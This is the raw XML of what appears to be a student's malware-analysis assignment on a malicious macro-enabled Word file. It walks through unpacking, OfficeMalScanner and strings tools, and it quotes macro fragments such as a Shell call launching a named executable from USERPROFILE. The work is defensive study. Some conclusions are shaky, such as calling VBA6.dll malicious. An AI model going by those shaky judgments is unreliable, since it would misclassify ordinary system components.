    <w:p w14:paraId="36D55429" w14:textId="310A7CAA" w:rsidR="0087771B" w:rsidRDefault="0087771B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D6271" w14:textId="6D349EBF" w:rsidR="0087771B" w:rsidRDefault="0087771B" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="0087771B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54CE5ADF" wp14:editId="0B80F49B">
            <wp:extent cx="5128704" cy="10668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E752" w14:textId="00C7B79B" w:rsidR="0087771B" w:rsidRDefault="0087771B" w:rsidP="00AF6F30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There is also a crypto function indicating a potential of using cryptography. This could be to encrypt or decrypt objects. This is a </w:t>
      </w:r>
      <w:r w:rsidR="00FE7652">
        <w:t>host-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indicator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062B0DA" w14:textId="2FF5EB06" w:rsidR="00C3548F" w:rsidRPr="000D785C" w:rsidRDefault="00C3548F" w:rsidP="00C3548F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D785C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Question</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 (</w:t>
      </w:r>
      <w:r w:rsidR="00C515A7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552759C2" w14:textId="4ADEC2A5" w:rsidR="00C3548F" w:rsidRDefault="00C3548F" w:rsidP="0007229F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Briefly describe the steps to analyse </w:t>
      </w:r>
      <w:r w:rsidR="00A53835">
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C743D6">
        <w:t>docm</w:t>
      </w:r>
      <w:r>
        <w:t>. Provide screenshots as evidence for each of the steps</w:t>
      </w:r>
      <w:r w:rsidR="00C515A7">
        <w:t>, including usage of strings2 and SSview tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB5B04" w14:textId="4312E648" w:rsidR="00C3548F" w:rsidRDefault="00C3548F" w:rsidP="00C3548F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>(1</w:t>
      </w:r>
      <w:r w:rsidR="002C2D02">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> marks) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DDA22" w14:textId="03B51228" w:rsidR="00E65DE7" w:rsidRDefault="00E65DE7" w:rsidP="00E65DE7">
      <w:pPr>
        <w:ind w:right="880"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Step 1 is to inflate the file since </w:t>
      </w:r>
      <w:r w:rsidR="00E57053">
        <w:t>it is a compressed file seeing .docm</w:t>
      </w:r>
      <w:r w:rsidR="003361AB">
        <w:t xml:space="preserve"> file extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9C067" w14:textId="6C817A36" w:rsidR="006C5E9C" w:rsidRDefault="006C5E9C" w:rsidP="00E65DE7">
      <w:pPr>
        <w:ind w:right="880"/>
      </w:pPr>
      <w:r w:rsidRPr="006C5E9C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C08FB8" wp14:editId="678821B1">
            <wp:extent cx="5731510" cy="4936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4D92" w14:textId="22CD1B06" w:rsidR="006C5E9C" w:rsidRDefault="006C5E9C" w:rsidP="00E65DE7">
      <w:pPr>
        <w:ind w:right="880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> After we will go into the </w:t>
      </w:r>
      <w:r w:rsidR="003B2FB7">
        <w:t xml:space="preserve">file and perform the command OfficeMalScanner vbaProject.bin info on the binary produced after the file was decompressed to see the different </w:t>
      </w:r>
      <w:r w:rsidR="0087771B">
        <w:t>macros</w:t>
      </w:r>
      <w:r w:rsidR="003B2FB7">
        <w:t xml:space="preserve"> in the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F83D115" w14:textId="24A1D92E" w:rsidR="000E4289" w:rsidRDefault="000E4289" w:rsidP="00E65DE7">
      <w:pPr>
        <w:ind w:right="880"/>
      </w:pPr>
      <w:r w:rsidRPr="000E4289">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23B50654" wp14:editId="1C6688FB">
            <wp:extent cx="5731510" cy="49282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84F0" w14:textId="23F07C08" w:rsidR="000E4289" w:rsidRDefault="00C63187" w:rsidP="00E65DE7">
      <w:pPr>
        <w:ind w:right="880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here we see two different VB-code, doc and ThisDocument. </w:t>
      </w:r>
      <w:r w:rsidR="0087771B">
        <w:t>Next,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we will analyse the strings in the bin file. Using the command strings2 -nh vbaProject.bin</w:t>
      </w:r>
      <w:r w:rsidR="002C2744">
        <w:t>. This identifies invisible strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C823B" w14:textId="33BCF5C3" w:rsidR="00BB73C4" w:rsidRDefault="00BB73C4" w:rsidP="00E65DE7">
      <w:pPr>
        <w:ind w:right="880"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732D1C11" w14:textId="77777777" w:rsidR="00BB73C4" w:rsidRDefault="00BB73C4" w:rsidP="00E65DE7">
      <w:pPr>
        <w:ind w:right="880"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321C5D08" w14:textId="25AE922F" w:rsidR="006A63E8" w:rsidRDefault="006A63E8" w:rsidP="00E65DE7">
      <w:pPr>
        <w:ind w:right="880"/>
      </w:pPr>
      <w:r w:rsidRPr="006A63E8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="352ACF25" wp14:editId="165CCD49">
            <wp:extent cx="5731510" cy="460121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7C04" w14:textId="5D096A3B" w:rsidR="005E0988" w:rsidRDefault="005E0988" w:rsidP="005E0988">
      <w:r w:rsidRPr="005E0988">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E1D421" wp14:editId="6D8DD841">
            <wp:extent cx="4450080" cy="361834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9870" cy="362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A0BF" w14:textId="24A5C6A1" w:rsidR="005E0988" w:rsidRDefault="005E0988" w:rsidP="004B370D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3012"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using SS view, we </w:t>
      </w:r>
      <w:r w:rsidR="004B370D">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> find the stream or location where the strings </w:t>
      </w:r>
      <w:r w:rsidR="005C0D9E">
        <w:t>are in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the bin file. An example is the string </w:t>
      </w:r>
      <w:r w:rsidR="004B370D">
        <w:t>highlighted in the screenshot was a string identified in the strings2 command. This string can be found in the dir section of the bin file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E2528D" w14:textId="3B4C2BEA" w:rsidR="00AB00CF" w:rsidRDefault="00BB4B93" w:rsidP="005C0D9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examine the extracted </w:t>
      </w:r>
      <w:r w:rsidR="009570DC">
        <w:t xml:space="preserve">macro </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="001074D5">
        <w:t xml:space="preserve">briefly describe the nature of the </w:t>
      </w:r>
      <w:r w:rsidR="00BB6369">
        <w:t>malicious code</w:t>
      </w:r>
      <w:r w:rsidR="00381B81">
        <w:t xml:space="preserve"> by indicating any host/</w:t>
      </w:r>
      <w:r w:rsidR="003B6EF2">
        <w:t>network-based</w:t>
      </w:r>
      <w:r w:rsidR="00381B81">
        <w:t xml:space="preserve"> indicators if any.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCCA474" w14:textId="51497797" w:rsidR="00AB00CF" w:rsidRDefault="00AB00CF" w:rsidP="00AB00CF">
      <w:r>
        <w:t>The macro might be running an executable as ther</w:t>
      </w:r>
      <w:r w:rsidR="004F0E9A">
        <w:t xml:space="preserve">e is an executable. This is seen in the notepad file Weccv1 = “BrhotakdNdVMM.exe”. The malware might also be targeting the “USERPROFILE” as seen with the variable Weccv2 set to “USERPROFILE”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7DB9D2" w14:textId="11498DD9" w:rsidR="00E328CF" w:rsidRDefault="00E328CF" w:rsidP="00AB00CF">
      <w:r>
        <w:t xml:space="preserve">We also see that </w:t>
      </w:r>
      <w:r w:rsidR="00643B58">
        <w:t>the malware has more host-based indicators with commands like ChDir (change directory). ChDrive</w:t>
      </w:r>
      <w:r w:rsidR="00520244">
        <w:t xml:space="preserve"> (change drive) to “Weccv2” and also performs a Shell command as seein in the line Weccv7 = Shell(Weccv10).</w:t>
      </w:r>
      <w:r w:rsidR="00643B58">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C62F7" w14:textId="18A2D062" w:rsidR="00313B84" w:rsidRDefault="00313B84" w:rsidP="008A1A8B">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="006C2416">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ma</w:t>
      </w:r>
      <w:r w:rsidR="008A1A8B">
        <w:t>rks</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFA168" w14:textId="7EBE5579" w:rsidR="00381B81" w:rsidRDefault="002C0A3A" w:rsidP="00381B81">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the provided </w:t>
      </w:r>
      <w:r w:rsidR="00B37F21" w:rsidRPr="00154C9D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>document_extract.py</w:t>
      </w:r>
      <w:r w:rsidR="00C515A7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C515A7" w:rsidRPr="00C515A7">
        <w:t>open this</w:t>
      </w:r>
      <w:r w:rsidR="00C515A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C515A7" w:rsidRPr="00C515A7">
        <w:t xml:space="preserve">.py file </w:t>
      </w:r>
      <w:r w:rsidR="00C515A7">
        <w:t xml:space="preserve">in a Text Editor, </w:t>
      </w:r>
      <w:r w:rsidR="00C515A7" w:rsidRPr="00C515A7">
        <w:t xml:space="preserve">study and understand it and </w:t>
      </w:r>
      <w:r w:rsidR="00C515A7">
        <w:t xml:space="preserve">know how to </w:t>
      </w:r>
      <w:r w:rsidR="00C515A7" w:rsidRPr="00C515A7">
        <w:t>use it</w:t>
      </w:r>
      <w:r w:rsidR="00C515A7">
        <w:t xml:space="preserve">. Then </w:t>
      </w:r>
      <w:r w:rsidR="00C22253">
        <w:t xml:space="preserve">analyse the output </w:t>
      </w:r>
      <w:r w:rsidR="00C515A7">
        <w:t xml:space="preserve">generated by this .py file </w:t>
      </w:r>
      <w:r w:rsidR="00C22253">
        <w:t>using BinText</w:t>
      </w:r>
      <w:r w:rsidR="00C34CE7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FB1EF0">
        <w:t>List down and justify</w:t>
      </w:r>
      <w:r w:rsidR="00A324EB">
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidR="00D05542">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A1346B">
        <w:t xml:space="preserve">interesting </w:t>
      </w:r>
      <w:r w:rsidR="00A46D76">
        <w:t>strings</w:t>
      </w:r>
      <w:r w:rsidR="00F83500">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628784B" w14:textId="5BD30629" w:rsidR="00781D63" w:rsidRDefault="00381B81" w:rsidP="00381B81">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C3548F">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="002C2D02">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00C3548F">
        <w:t xml:space="preserve"> marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A04922" w14:textId="5069B00A" w:rsidR="0087771B" w:rsidRDefault="00B44603" w:rsidP="0087771B">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t>Upon seeing the first function, I tried message_extract.py document.docm output.txt This is the output it produced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0193432F" w14:textId="671AB9C7" w:rsidR="00B44603" w:rsidRDefault="00B44603" w:rsidP="0087771B">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B44603">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1724E392" wp14:editId="39AD445F">
            <wp:extent cx="5341620" cy="378103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6041" cy="378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E9D4" w14:textId="52081C20" w:rsidR="005C0D9E" w:rsidRDefault="005C0D9E" w:rsidP="0087771B">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t>Then I opened this output in bintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C5566" w14:textId="3A0CD843" w:rsidR="00164760" w:rsidRDefault="00164760" w:rsidP="0087771B">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r w:rsidRPr="00164760">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C625669" wp14:editId="6D91280E">
            <wp:extent cx="5731510" cy="366839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FC7" w14:textId="0EA15D5E" w:rsidR="00195B45" w:rsidRDefault="00195B45" w:rsidP="0087771B">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we will look at the interesting strings. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F879FD0" w14:textId="5031F935" w:rsidR="00195B45" w:rsidRDefault="00CA627E" w:rsidP="00195B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t>‘C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB’. Indicates a potential manipulation of the directory or file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283237A1" w14:textId="289B5977" w:rsidR="00FD6790" w:rsidRDefault="00FD6790" w:rsidP="00195B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kerNel32.dll. Wrong dll that could be malicious. Trying to hide as </w:t>
      </w:r>
      <w:r w:rsidR="005C0D9E">
        <w:t>Kernel32.dll.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2895559E" w14:textId="2640602D" w:rsidR="00E335F9" w:rsidRDefault="00E335F9" w:rsidP="00195B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t>VBA6.dll. Not a regular dll highly likely to me a malicious dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6569F" w14:textId="67D54788" w:rsidR="00EA7328" w:rsidRDefault="004724EB" w:rsidP="00195B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1903.1000.exe. Right above it is the string Original Filename indicating that this exe mentioned is likely to be a renamed version of the file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C26117B" w14:textId="6856EAAC" w:rsidR="00166181" w:rsidRDefault="00166181" w:rsidP="00195B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CreateFileA indicates creation of a file </w:t>
      </w:r>
      <w:r w:rsidR="005C0D9E">
        <w:t>which is a host absed indicator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAC6D6" w14:textId="3C0959D1" w:rsidR="006C2449" w:rsidRDefault="006C2449" w:rsidP="00BC1568">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452184B0" w14:textId="77777777" w:rsidR="00520244" w:rsidRDefault="00520244" w:rsidP="00520244">
      <w:pPr>
        <w:ind w:right="440"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00520244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C4DAE" w14:textId="77777777" w:rsidR="005244EB" w:rsidRDefault="005244EB" w:rsidP="00CA48AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="035E8A53" w14:textId="77777777" w:rsidR="005244EB" w:rsidRDefault="005244EB" w:rsidP="00CA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B85D" w14:textId="4184B98B" w:rsidR="00CA48AC" w:rsidRDefault="00DD1E9F">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pP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08371F"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 w:rsidR="0008371F">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="48E78B72" w14:textId="77777777" w:rsidR="00CA48AC" w:rsidRDefault="00CA4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6390B" w14:textId="77777777" w:rsidR="005244EB" w:rsidRDefault="005244EB" w:rsidP="00CA48AC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54E97582" w14:textId="77777777" w:rsidR="005244EB" w:rsidRDefault="005244EB" w:rsidP="00CA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F8CC" w14:textId="5878CB69" w:rsidR="007C5FA6" w:rsidRDefault="007C5F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D2057D5" wp14:editId="4D0E2FF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12" name="MSIPCM679c43b2bc8b08e171d7c164" descr="{&quot;HashCode&quot;:-83802270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4B0C75" w14:textId="7AD0906D" w:rsidR="007C5FA6" w:rsidRPr="007C5FA6" w:rsidRDefault="007C5FA6" w:rsidP="007C5FA6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7C5FA6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2057D5" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="MSIPCM679c43b2bc8b08e171d7c164" o:spid="_x0000_s1026" type="#_x0000_t202" alt="{&quot;HashCode&quot;:-838022706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" o:allowincell="f" filled="f" stroked="f" strokeweight=".5pt">
              <v:textbox inset="20pt,0,,0">
                <w:txbxContent>
                  <w:p w14:paraId="334B0C75" w14:textId="7AD0906D" w:rsidR="007C5FA6" w:rsidRPr="007C5FA6" w:rsidRDefault="007C5FA6" w:rsidP="007C5FA6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7C5FA6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</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r w:rsidRPr="007C5FA6">
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:color w:val="000000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2D8B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D84A26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E7540"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9018614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B3957"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B6440F8"/>
    <w:lvl w:ilvl="0" w:tplc="ACFCB7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A1D3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D638A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6F1BDB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B7E367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782B7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5650D79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264112"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1770A1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0650FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D79CFF1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5F4A55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B1A08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D6373"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0132146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54490C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0466E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D516FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE186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0428679">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="566846046">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="157691265">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1086269881">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1727334061">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2117285613">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2096901046">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="701905807">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1371342523">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="77289619">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="275255059">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1957749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238"/>
    <w:rsid w:val="00004FDD"/>
    <w:rsid w:val="00005CA7"/>
    <w:rsid w:val="00015F8E"/>
    <w:rsid w:val="0003157D"/>
    <w:rsid w:val="000349FB"/>
    <w:rsid w:val="00034EED"/>
    <w:rsid w:val="000375F7"/>
    <w:rsid w:val="0004710F"/>
    <w:rsid w:val="0004780C"/>
    <w:rsid w:val="00062EDD"/>
    <w:rsid w:val="00070864"/>
    <w:rsid w:val="00071B04"/>
    <w:rsid w:val="0007229F"/>
    <w:rsid w:val="0008371F"/>
    <w:rsid w:val="00087DDF"/>
    <w:rsid w:val="0009538F"/>
    <w:rsid w:val="00097967"/>
    <w:rsid w:val="000A310F"/>
    <w:rsid w:val="000C594B"/>
    <w:rsid w:val="000D785C"/>
    <w:rsid w:val="000E2604"/>
    <w:rsid w:val="000E4289"/>
    <w:rsid w:val="000F1E8D"/>
    <w:rsid w:val="00100C9B"/>
    <w:rsid w:val="001074D5"/>
    <w:rsid w:val="001265EF"/>
    <w:rsid w:val="0012794D"/>
    <w:rsid w:val="001302A6"/>
    <w:rsid w:val="00147B3F"/>
    <w:rsid w:val="00154C9D"/>
    <w:rsid w:val="00157572"/>
    <w:rsid w:val="00162A15"/>
    <w:rsid w:val="00164760"/>
    <w:rsid w:val="0016616E"/>
    <w:rsid w:val="00166181"/>
    <w:rsid w:val="0017093E"/>
    <w:rsid w:val="001751CF"/>
    <w:rsid w:val="00176F5A"/>
    <w:rsid w:val="001926DD"/>
    <w:rsid w:val="00194F2A"/>
    <w:rsid w:val="00195B45"/>
    <w:rsid w:val="00197890"/>
    <w:rsid w:val="001A3359"/>
    <w:rsid w:val="001B0046"/>
    <w:rsid w:val="001B2A6E"/>
    <w:rsid w:val="001B57C6"/>
    <w:rsid w:val="001D2780"/>
    <w:rsid w:val="00203F83"/>
    <w:rsid w:val="00205DE7"/>
    <w:rsid w:val="00223796"/>
    <w:rsid w:val="00234386"/>
    <w:rsid w:val="00237BF2"/>
    <w:rsid w:val="00244104"/>
    <w:rsid w:val="00256588"/>
    <w:rsid w:val="002632C0"/>
    <w:rsid w:val="00273FC3"/>
    <w:rsid w:val="00275D06"/>
    <w:rsid w:val="00280DAA"/>
    <w:rsid w:val="002902F2"/>
    <w:rsid w:val="002A4073"/>
    <w:rsid w:val="002A4E76"/>
    <w:rsid w:val="002A57B7"/>
    <w:rsid w:val="002C0A3A"/>
    <w:rsid w:val="002C2744"/>
    <w:rsid w:val="002C2D02"/>
    <w:rsid w:val="002C6AF8"/>
    <w:rsid w:val="002D20A4"/>
    <w:rsid w:val="002D6517"/>
    <w:rsid w:val="002E2C71"/>
    <w:rsid w:val="002F1E11"/>
    <w:rsid w:val="002F46B5"/>
    <w:rsid w:val="003030D3"/>
    <w:rsid w:val="003048DC"/>
    <w:rsid w:val="003052D6"/>
    <w:rsid w:val="00313B84"/>
    <w:rsid w:val="0031425E"/>
    <w:rsid w:val="00322DF9"/>
    <w:rsid w:val="003335C3"/>
    <w:rsid w:val="003361AB"/>
    <w:rsid w:val="003450F1"/>
    <w:rsid w:val="003518DA"/>
    <w:rsid w:val="00353D09"/>
    <w:rsid w:val="0036603B"/>
    <w:rsid w:val="003675AC"/>
    <w:rsid w:val="00371388"/>
    <w:rsid w:val="00381B81"/>
    <w:rsid w:val="003A3508"/>
    <w:rsid w:val="003A402E"/>
    <w:rsid w:val="003B109B"/>
    <w:rsid w:val="003B13B6"/>
    <w:rsid w:val="003B2FB7"/>
    <w:rsid w:val="003B39C2"/>
    <w:rsid w:val="003B3A84"/>
    <w:rsid w:val="003B3A88"/>
    <w:rsid w:val="003B44B0"/>
    <w:rsid w:val="003B6EF2"/>
    <w:rsid w:val="003E3FF8"/>
    <w:rsid w:val="003F2E6C"/>
    <w:rsid w:val="004020FE"/>
    <w:rsid w:val="00410A83"/>
    <w:rsid w:val="0044123A"/>
    <w:rsid w:val="00461CB3"/>
    <w:rsid w:val="0046368A"/>
    <w:rsid w:val="004724EB"/>
    <w:rsid w:val="00475BC9"/>
    <w:rsid w:val="00485D46"/>
    <w:rsid w:val="004A3578"/>
    <w:rsid w:val="004B370D"/>
    <w:rsid w:val="004B431D"/>
    <w:rsid w:val="004C4B85"/>
    <w:rsid w:val="004D02DE"/>
    <w:rsid w:val="004E0AED"/>
    <w:rsid w:val="004F0E9A"/>
    <w:rsid w:val="00514CC5"/>
    <w:rsid w:val="00520244"/>
    <w:rsid w:val="00522DD8"/>
    <w:rsid w:val="005244EB"/>
    <w:rsid w:val="00527B38"/>
    <w:rsid w:val="0056565C"/>
    <w:rsid w:val="00565F80"/>
    <w:rsid w:val="0057604F"/>
    <w:rsid w:val="005A09BA"/>
    <w:rsid w:val="005C0D9E"/>
    <w:rsid w:val="005D26BE"/>
    <w:rsid w:val="005E0988"/>
    <w:rsid w:val="005F1A52"/>
    <w:rsid w:val="005F7FC8"/>
    <w:rsid w:val="00602BF7"/>
    <w:rsid w:val="0060475C"/>
    <w:rsid w:val="00605B45"/>
    <w:rsid w:val="00614DDF"/>
    <w:rsid w:val="00616EBB"/>
    <w:rsid w:val="00636952"/>
    <w:rsid w:val="00643B58"/>
    <w:rsid w:val="00650B42"/>
    <w:rsid w:val="00664626"/>
    <w:rsid w:val="00671358"/>
    <w:rsid w:val="00674F96"/>
    <w:rsid w:val="00682FE4"/>
